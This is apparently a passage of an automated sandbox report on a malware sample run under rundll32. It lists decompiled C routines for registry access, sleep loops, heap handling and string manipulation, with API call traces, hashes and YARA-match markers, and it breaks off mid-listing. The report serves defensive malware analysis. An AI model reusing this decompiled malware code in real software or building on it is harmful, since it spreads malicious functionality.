                                            • Opcode Fuzzy Hash: 2d72d3d55e27035809f0da3805a262f5cddf02ad5f398c47c1cfa90540f60b7d
                                            • Instruction Fuzzy Hash: 4C214F73D00219ABDB20AFE48C84EEE77ADEF89354B0544B5EB11A7140E775FE458BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4E0B Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F4E0B(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E049F4DF6(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E049F4C73(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E049F7849(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                            0x049f4e17
                                            0x049f4e3a
                                            0x049f4e44
                                            0x049f4e4a
                                            0x049f4e4e
                                            0x049f4e66
                                            0x049f4e6b
                                            0x049f4eb3
                                            0x049f4e6d
                                            0x049f4e75
                                            0x049f4e79
                                            0x049f4eb0
                                            0x049f4e7b
                                            0x049f4e8d
                                            0x049f4e91
                                            0x049f4ea7
                                            0x049f4e93
                                            0x049f4e96
                                            0x049f4e98
                                            0x049f4e9d
                                            0x049f4ea2
                                            0x049f4ea2
                                            0x049f4e9d
                                            0x049f4e91
                                            0x049f4e79
                                            0x049f4ebb
                                            0x049f4ebb
                                            0x049f4ec2
                                            0x049f4ec8
                                            0x049f4ec8
                                            0x049f4e30
                                            0x049f4e34
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • RegOpenKeyW.ADVAPI32(80000002,04F79EC2,04F79EC2), ref: 049F4E44
                                            • RegQueryValueExW.KERNEL32(04F79EC2,?,00000000,80000002,00000000,00000000,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2,80000002), ref: 049F4E66
                                            • RegQueryValueExW.ADVAPI32(04F79EC2,?,00000000,80000002,00000000,00000000,00000000,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2), ref: 049F4E8B
                                            • RegCloseKey.KERNEL32(04F79EC2,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2,80000002,00000000,?), ref: 049F4EBB
                                              • Part of subcall function 049F7849: SafeArrayDestroy.OLEAUT32(00000000), ref: 049F78D1
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                            • String ID:
                                            • API String ID: 486277218-0
                                            • Opcode ID: c1276ed5399577f3308283e68a62124260c6e0dfe3960670c603863088152179
                                            • Instruction ID: 56defddd23033a89da71b96172eae94f6c387636300e4f8f27510d80c0ac58e0
                                            • Opcode Fuzzy Hash: c1276ed5399577f3308283e68a62124260c6e0dfe3960670c603863088152179
                                            • Instruction Fuzzy Hash: F121397350011ABFDF11AE94DD848EF7BADFB18250B058435FF1596220D631AD609B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581EF7B Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExA.KERNEL32(05816085,?,00000000,05816085,00000000,05816095,05816085,?,?,?,?,058162F4,80000001,?,05816085,05816095), ref: 0581EFA0
                                            • RtlAllocateHeap.NTDLL(00000000,05816095,00000000), ref: 0581EFB7
                                            • HeapFree.KERNEL32(00000000,00000000,?,058162F4,80000001,?,05816085,05816095,?,0581CC7F,80000001,?,05816085), ref: 0581EFD2
                                            • RegQueryValueExA.KERNEL32(05816085,?,00000000,05816085,00000000,05816095,?,058162F4,80000001,?,05816085,05816095,?,0581CC7F,80000001), ref: 0581EFF1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateFree
                                            • String ID:
                                            • API String ID: 4267586637-0
                                            • Opcode ID: 65add16a69b552603371efbc2a908f7ebf188b0f59ee8fc27c4cc69405934e09
                                            • Instruction ID: 1af5d2722bf304c561bf4fba1add9ae57b6dade4b5d06cd560d83fe1e32d87a0
                                            • Opcode Fuzzy Hash: 65add16a69b552603371efbc2a908f7ebf188b0f59ee8fc27c4cc69405934e09
                                            • Instruction Fuzzy Hash: F51128B6500118BFDB229F95DC85CEEBFBDFB88660B1040A6FD05A7110D6716E40DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F39B5 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 65%
                                            			E049F39B5(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L049F8326();
					_t34 = _t16 + _t13;
					_t18 = E049F54D5(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                                            0x049f39ba
                                            0x049f39c5
                                            0x049f39c6
                                            0x049f39c6
                                            0x049f39d2
                                            0x049f39db
                                            0x049f39de
                                            0x049f39e2
                                            0x049f39e4
                                            0x049f39e9
                                            0x049f39ea
                                            0x049f39eb
                                            0x049f39f5
                                            0x049f39f8
                                            0x049f39ff
                                            0x049f3a03
                                            0x049f3a0a
                                            0x049f3a10
                                            0x049f3a1a

                                            APIs
                                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,049F3D61,?,?), ref: 049F39C6
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,049F3D61,?,?), ref: 049F39D2
                                            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 049F39EB
                                              • Part of subcall function 049F54D5: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 049F5534
                                            • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,049F3D61,?,?), ref: 049F3A0A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                            • String ID:
                                            • API String ID: 1610602887-0
                                            • Opcode ID: b57ad07f52ecc9a4a122b7c8385980cfd84bb2d0d2835d6ce4ed3f19fbee6d3e
                                            • Instruction ID: bab9892d1a58fbf05e6a0a16ff98709d604ded827252c9e57aa36815f1bcb645
                                            • Opcode Fuzzy Hash: b57ad07f52ecc9a4a122b7c8385980cfd84bb2d0d2835d6ce4ed3f19fbee6d3e
                                            • Instruction Fuzzy Hash: D0F0A4B3A002147BD7149BA4DC1DFDE7AB9DBC4365F150134FA02E7240E6B8AA008B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058016A1 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016C0
                                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016CB
                                            • _wcsupr.NTDLL ref: 058016D8
                                            • lstrlenW.KERNEL32(00000000), ref: 058016E0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                            • String ID:
                                            • API String ID: 2533608484-0
                                            • Opcode ID: 079a6fd0bc46212a42b174d0b0d3dcdd0ba10a16823f87beb117cd8daec9ef71
                                            • Instruction ID: 52f96a96b0d4385ef642b28a59fb5be983b83138f65bb02f53e3b27d2d8f89de
                                            • Opcode Fuzzy Hash: 079a6fd0bc46212a42b174d0b0d3dcdd0ba10a16823f87beb117cd8daec9ef71
                                            • Instruction Fuzzy Hash: B9F0B4326053106A97626A795CCDE7B9E5DFF80B727205128FD01D2194CE64DC41C6A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05819CDB Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05819CFA
                                              • Part of subcall function 058123C2: RtlEnterCriticalSection.NTDLL(00000000), ref: 058123CE
                                              • Part of subcall function 058123C2: CloseHandle.KERNEL32(?), ref: 058123DC
                                              • Part of subcall function 058123C2: RtlLeaveCriticalSection.NTDLL(00000000), ref: 058123F8
                                            • FindCloseChangeNotification.KERNEL32(?), ref: 05819D08
                                            • InterlockedDecrement.KERNEL32(0582907C), ref: 05819D17
                                              • Part of subcall function 05813EC0: SetEvent.KERNEL32(00000598,05819D32), ref: 05813ECA
                                              • Part of subcall function 05813EC0: CloseHandle.KERNEL32(00000598), ref: 05813EDF
                                              • Part of subcall function 05813EC0: HeapDestroy.KERNELBASE(05980000), ref: 05813EEF
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05819D33
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
                                            • String ID:
                                            • API String ID: 2993087875-0
                                            • Opcode ID: 05360a8a08e7692c3228f91229e2bb51c8a34860e9092826a80e8e4ad0572b8a
                                            • Instruction ID: 48f7663360eb5d823a58a88733159ef04780b110e52e004866b02a2c0c34b78a
                                            • Opcode Fuzzy Hash: 05360a8a08e7692c3228f91229e2bb51c8a34860e9092826a80e8e4ad0572b8a
                                            • Instruction Fuzzy Hash: A9F0A974650214ABD7115B6A980AF793F7CEB41771F104205FD19C32D0DF749D818B66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F68F5 Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 50%
                                            			E049F68F5(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x49fa3cc; // 0x4f795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x49fa3cc; // 0x4f795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x49fa030) {
					HeapFree( *0x49fa2d8, 0, _t8);
				}
				_t9 = E049F4117(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x49fa3cc; // 0x4f795b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                            0x049f68f5
                                            0x049f68f5
                                            0x049f68fe
                                            0x049f690e
                                            0x049f690e
                                            0x049f6913
                                            0x049f6918
                                            0x00000000
                                            0x00000000
                                            0x049f6908
                                            0x049f6908
                                            0x049f691a
                                            0x049f691e
                                            0x049f6930
                                            0x049f6930
                                            0x049f693b
                                            0x049f6940
                                            0x049f6943
                                            0x049f6948
                                            0x049f694c
                                            0x049f6952

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F68FE
                                            • Sleep.KERNEL32(0000000A), ref: 049F6908
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F6930
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F694C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: 0e732edfc74dd151f435dd0b962073ce1bb2c3daea09901995302638d7c75607
                                            • Instruction ID: 462b070e2a5ba2c76a99a5f797a7e5575b266473b803f502bc094e7239274400
                                            • Opcode Fuzzy Hash: 0e732edfc74dd151f435dd0b962073ce1bb2c3daea09901995302638d7c75607
                                            • Instruction Fuzzy Hash: F9F0F8B0309341ABE7209F68DE49F163FE8EB50344B084434FA5AD6661D628EC91DB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F67E2 Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F67E2(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E049F6955(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x49fa348; // 0x57d5a8
				_t4 = _t24 + 0x49fbe30; // 0x4f793d8
				_t5 = _t24 + 0x49fbdd8; // 0x4f0053
				_t26 = E049F427E( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x49fa348; // 0x57d5a8
						_t11 = _t32 + 0x49fbe24; // 0x4f793cc
						_t48 = _t11;
						_t12 = _t32 + 0x49fbdd8; // 0x4f0053
						_t52 = E049F6203(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x49fa348; // 0x57d5a8
							_t13 = _t35 + 0x49fbe6e; // 0x30314549
							if(E049F13F8(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x49fa2fc - 6;
								if( *0x49fa2fc <= 6) {
									_t42 =  *0x49fa348; // 0x57d5a8
									_t15 = _t42 + 0x49fbdba; // 0x52384549
									E049F13F8(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x49fa348; // 0x57d5a8
							_t17 = _t38 + 0x49fbe68; // 0x4f79410
							_t18 = _t38 + 0x49fbe40; // 0x680043
							_t40 = E049F3B76(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x49fa2d8, 0, _t52);
						}
					}
					HeapFree( *0x49fa2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E049F5147(_t54);
				}
				return _t45;
			}



















                                            0x049f67e2
                                            0x049f67f2
                                            0x049f67f5
                                            0x049f67fc
                                            0x049f67fe
                                            0x049f67fe
                                            0x049f6801
                                            0x049f6806
                                            0x049f680d
                                            0x049f681a
                                            0x049f681f
                                            0x049f6823
                                            0x049f6831
                                            0x049f683f
                                            0x049f6843
                                            0x049f68d4
                                            0x049f68d4
                                            0x049f6849
                                            0x049f6849
                                            0x049f684e
                                            0x049f684e
                                            0x049f6855
                                            0x049f6861
                                            0x049f6863
                                            0x049f6865
                                            0x049f6867
                                            0x049f686e
                                            0x049f6880
                                            0x049f6882
                                            0x049f6889
                                            0x049f688b
                                            0x049f6892
                                            0x049f689d
                                            0x049f689d
                                            0x049f6889
                                            0x049f68a2
                                            0x049f68a7
                                            0x049f68ae
                                            0x049f68be
                                            0x049f68cc
                                            0x049f68ce
                                            0x049f68ce
                                            0x049f6865
                                            0x049f68e0
                                            0x049f68e0
                                            0x049f68e2
                                            0x049f68e7
                                            0x049f68e9
                                            0x049f68e9
                                            0x049f68f4

                                            APIs
                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F793D8,00000000,?,76CDF710,00000000,76CDF730), ref: 049F6831
                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F79410,?,00000000,30314549,00000014,004F0053,04F793CC), ref: 049F68CE
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6BB4), ref: 049F68E0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 3c497ebeea829fa4389cdb4ea1607e1884b593ae2dea100fd34c8e41e2b4e7eb
                                            • Instruction ID: 03ff2238e26680645c44a02315f17cc259f0660c6a94af7be120ac08b19ae8f4
                                            • Opcode Fuzzy Hash: 3c497ebeea829fa4389cdb4ea1607e1884b593ae2dea100fd34c8e41e2b4e7eb
                                            • Instruction Fuzzy Hash: 26316972A00218BFDB219B94DC88EDE7BBDEB48714F140079EA04AB121D7B1BE459B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806B6A Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581BAC0: RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                              • Part of subcall function 0581BAC0: lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,05828068,00000000,00000001,00000000,?,0582806E,00000000,?,?,?,?,00000000), ref: 05806BBE
                                            • RegSetValueExA.KERNEL32(05828068,00000003,00000000,00000003,05828068,00000028), ref: 05806BFF
                                            • RegCloseKey.ADVAPI32(?), ref: 05806C0B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value$CloseCreateQuerylstrlen
                                            • String ID:
                                            • API String ID: 2552977122-0
                                            • Opcode ID: 89b8e9721737856f667cb0a7beb97fbb77a5cb3629bf9e259bc7c707c92d3032
                                            • Instruction ID: 462589f578d362060c89e994c584531832bcffac9856f5c0bdfdb2c4d83bf63a
                                            • Opcode Fuzzy Hash: 89b8e9721737856f667cb0a7beb97fbb77a5cb3629bf9e259bc7c707c92d3032
                                            • Instruction Fuzzy Hash: 1D31F875910328AFEF61DB95DC499AEBFB8FB04750F108056ED04E2240DB706E84CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F250D Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E049F250D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x49fa2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E049F799E(_t57 - _a4, _a4, _t48);
							_t38 = E049F799E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E049F799E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                            0x049f2515
                                            0x049f2518
                                            0x049f251a
                                            0x049f2523
                                            0x049f2535
                                            0x049f2535
                                            0x049f2539
                                            0x049f253b
                                            0x049f253e
                                            0x049f2541
                                            0x049f254a
                                            0x049f2554
                                            0x049f2558
                                            0x049f255d
                                            0x049f256d
                                            0x049f2573
                                            0x049f2577
                                            0x049f25c6
                                            0x049f2579
                                            0x049f2579
                                            0x049f2582
                                            0x049f2591
                                            0x049f2596
                                            0x049f25a3
                                            0x049f25ac
                                            0x049f25b7
                                            0x049f25be
                                            0x049f25c2
                                            0x049f25c2
                                            0x049f2577
                                            0x049f25cd
                                            0x049f25d4

                                            APIs
                                            • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 049F2541
                                            • StrStrA.SHLWAPI(00000000,?), ref: 049F254E
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 049F256D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 556738718-0
                                            • Opcode ID: f6cb60965998f57d12a11ed18510c0b1d4b4031bb93f9b292dcf81a76a469a1c
                                            • Instruction ID: f7bb65a92e763d542b4c4c2d6394538315f28268af05bcfdf84c59783c0d0945
                                            • Opcode Fuzzy Hash: f6cb60965998f57d12a11ed18510c0b1d4b4031bb93f9b292dcf81a76a469a1c
                                            • Instruction Fuzzy Hash: 35216036600219AFDF11DF68C884B9EBFB9EF85314F1481A0ED44AB305D735E915CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05816278 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05819C23: lstrlen.KERNEL32(?,00000000,?,00000027,05829208,?,00000000,?,?,?,?,?,0580BDC2,?,00000001), ref: 05819C59
                                              • Part of subcall function 05819C23: lstrcpy.KERNEL32(00000000,00000000), ref: 05819C7D
                                              • Part of subcall function 05819C23: lstrcat.KERNEL32(00000000,00000000), ref: 05819C85
                                            • RegOpenKeyExA.KERNEL32(0581CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0581CC7F,80000001,?,05816085), ref: 058162BF
                                            • RegOpenKeyExA.ADVAPI32(0581CC7F,0581CC7F,00000000,00020019,80000001,?,0581CC7F,80000001,?,05816085), ref: 058162D5
                                            • RegCloseKey.KERNEL32(80000001,80000001,?,05816085,05816095,?,0581CC7F,80000001,?,05816085), ref: 0581631E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Open$Closelstrcatlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4131162436-0
                                            • Opcode ID: 28c7973d1c9b6d325f423db3bd33b11fc3cb222bb5dbb46563d655a9f1cb0558
                                            • Instruction ID: 5d2915c5a0c9325129ab3c07274744d85392669ff0737a1024645602fc25554c
                                            • Opcode Fuzzy Hash: 28c7973d1c9b6d325f423db3bd33b11fc3cb222bb5dbb46563d655a9f1cb0558
                                            • Instruction Fuzzy Hash: 8421F9B2A00209BFDF11EF96DC85CAEBFBDEB08214B104069FE05E7151E770AE559B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4117 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 47%
                                            			E049F4117(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E049F4DF6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x49f9284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                            0x049f411b
                                            0x049f4128
                                            0x049f412a
                                            0x049f412b
                                            0x049f4133
                                            0x049f4133
                                            0x049f4137
                                            0x00000000
                                            0x00000000
                                            0x049f412e
                                            0x049f412f
